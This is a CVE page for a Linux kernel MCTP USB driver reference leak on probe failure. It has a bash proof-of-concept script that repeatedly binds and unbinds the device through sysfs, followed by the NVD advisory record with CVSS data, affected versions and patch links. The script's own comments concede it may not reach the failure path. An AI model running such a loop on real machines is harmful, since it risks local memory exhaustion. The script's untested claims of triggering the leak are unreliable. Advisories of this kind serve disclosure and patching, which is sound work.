CVE-2026-43375

#!/bin/bash # PoC to trigger the memory leak by forcing bind/unbind cycles # This script assumes the presence of a vulnerable MCTP device. # Replace '1-1' with the actual bus and device number. DEVICE_ID="1-1" DRIVER_PATH="/sys/bus/usb/drivers/mctp" if [ ! -d "$DRIVER_PATH" ]; then echo "MCTP driver not loaded or path incorrect." exit 1 fi echo "Starting exploit loop to trigger memory leak..." for i in {1..1000} do # Attempt to unbind the device (safe check) if [ -d "$DRIVER_PATH/$DEVICE_ID" ]; then echo "$DEVICE_ID" > "$DRIVER_PATH/unbind" 2>/dev/null fi # Attempt to bind the device, triggering the probe function # If probe fails (or even if it succeeds and we unbind), the leak might occur depending on exact failure condition. # To specifically target probe failure, specific hardware emulation or malformed descriptors might be needed, # but repeatedly loading/unloading the module or binding can stress the logic. echo "$DEVICE_ID" > "$DRIVER_PATH/bind" 2>/dev/null echo "Iteration $i: Triggered bind/unbind" done echo "Exploit loop finished."

{"cve": {"id": "CVE-2026-43375", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-08T15:16:48.650", "lastModified": "2026-05-15T15:16:08.877", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: mctp: fix device leak on probe failure\n\nDriver core holds a reference to the USB interface and its parent USB\ndevice while the interface is bound to a driver and there is no need to\ntake additional references unless the structures are needed after\ndisconnect.\n\nThis driver takes a reference to the USB device during probe but does\nnot to release it on probe failures.\n\nDrop the redundant device reference to fix the leak, reduce cargo\nculting, make it easier to spot drivers where an extra reference is\nneeded, and reduce the risk of further memory leaks."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.15", "versionEndExcluding": "6.18.19", "matchCriteriaId": "D6461E17-9936-4679-8F97-568871A6FBE4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.9", "matchCriteriaId": "E825E7C3-FEAC-4FD3-8A81-78D7387948C9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/224a0d284c3caf1951302d1744a714784febed71", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/3224990fb16a831aabc50b67c74f5d0074ce80dd", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ec9538f9b5cd1db5e8c612aa636b6119b6355c5d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}